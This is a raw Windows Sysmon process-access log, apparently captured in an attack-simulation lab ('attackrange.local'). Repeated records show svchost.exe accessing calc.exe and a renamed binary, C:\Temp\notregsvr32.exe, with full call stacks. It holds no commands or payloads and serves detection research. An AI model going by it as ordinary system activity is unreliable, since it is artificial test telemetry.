22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361546Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361545Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361544Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361543Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361542Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361541Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361540Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361539Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361538Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361537Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361536Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361535Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361534Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361533Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361532Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361531Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361530Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361529Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361528Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361527Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361526Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361525Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 